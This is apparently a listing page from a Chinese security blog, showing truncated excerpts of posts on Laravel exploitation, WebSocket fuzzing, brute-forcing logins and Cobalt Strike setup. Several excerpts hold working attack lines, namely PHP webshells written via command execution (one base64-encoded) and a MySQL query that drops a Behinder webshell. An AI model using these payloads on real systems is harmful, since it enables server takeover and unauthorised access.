网络安全 第23页
XSS社区是网络安全爱好者聚集地
Laravel漏洞扫描-XSS博客

Laravel漏洞扫描

功能 Laravel 指纹 Laravel 泄漏.env Laravel 调试模式 Laravel 点火 CVE-2021-3129 交互模式 安装 克隆存储库和依赖项 git clone https://github.com/xsxtw/larasploit cd larasploit pip3 ins...
xss-admin的头像-XSS博客xss-admin1年前
027713
websocket-turbo-intruder模糊渗透测试-XSS博客

websocket-turbo-intruder模糊渗透测试

WebSocket Turbo 入侵者 https://github.com/xsxtw/websocket-turbo-intruder 使用自定义 Python 代码扩展模糊 WebSocket 消息 用法 右键单击 WebSockets 消息并转到Extensions > WebSocket Tur...
xss-admin的头像-XSS博客xss-admin1年前
017015
记php命令执行写shell-XSS博客

记php命令执行写shell

php代码执行&命令执行 getshell echo PD9waHAgZXZhbCgkX1BPU1Rbd2hvYW1pXSk7Pz4=|base64 -d > /var/www/html/shell.php echo \<\?php eval\(\@\$_POST\[1\]\)\; \?\> >1.php bypass 绕过...
xss-admin的头像-XSS博客xss-admin1年前
013814
burp插件之爆破定时暂停脚本 防止ip被封-XSS博客

burp插件之爆破定时暂停脚本 防止ip被封

简介 渗透测试登录凭据时,通常可以在指定数量的测试请求后设置暂停时间,以避免目标站点阻止攻击,这通常很有用。 许多网站针对此类重复的登录请求实施了网络防御措施,以防止滥用,并且在用户...
xss-admin的头像-XSS博客xss-admin1年前
01345
turbo intruder常用脚本-XSS博客

turbo intruder常用脚本

爆破用户名密码 from urllib import quote def user_password_brute(target, engine): for password in open('D:\\crypto\\mutou\\fuzzDicts\\passwordDict\\top500.txt'): for user in open('D...
xss-admin的头像-XSS博客xss-admin1年前
01039
mysql写冰蝎马-XSS博客

mysql写冰蝎马

select '<?php file_put_contents('abab.php',base64_decode('Jmx0Oz9waHANCkBlcnJvcl9yZXBvcnRpbmcoMCk7DQpzZXNzaW9uX3N0YXJ0KCk7DQogICAgJGtleT0iZTQ1ZTMyOWZlYjVkOTI1YiI7IA0KCSRfU0VTU0l...
xss-admin的头像-XSS博客xss-admin1年前
010711
masscan 读文件扫描-XSS博客

masscan 读文件扫描

masscan -iL ip.txt -p1-65535 --rate=1000 -oL port.txt
xss-admin的头像-XSS博客xss-admin1年前
0989
centos7安装msf-XSS博客

centos7安装msf

一把梭 yum install -y curl,wget yum install sqlite-devel libxslt-devel libxml2-devel java-1.7.0-openjdk libpcap-devel nano openssl-devel zlib-devel libffi-devel gdbm-devel readline...
xss-admin的头像-XSS博客xss-admin1年前
010913
cobaltstrike加载插件中文乱码解决-XSS博客

cobaltstrike加载插件中文乱码解决

前言 Windows下使用cs加载各种插件遇到乱码,可以用下面命令指定编码打开客户端解决。 java -Dfile.encoding=utf-8 -XX:ParallelGCThreads=4 -XX:+AggressiveHeap -XX:+UseParallelGC -Xms512M ...
xss-admin的头像-XSS博客xss-admin1年前
016315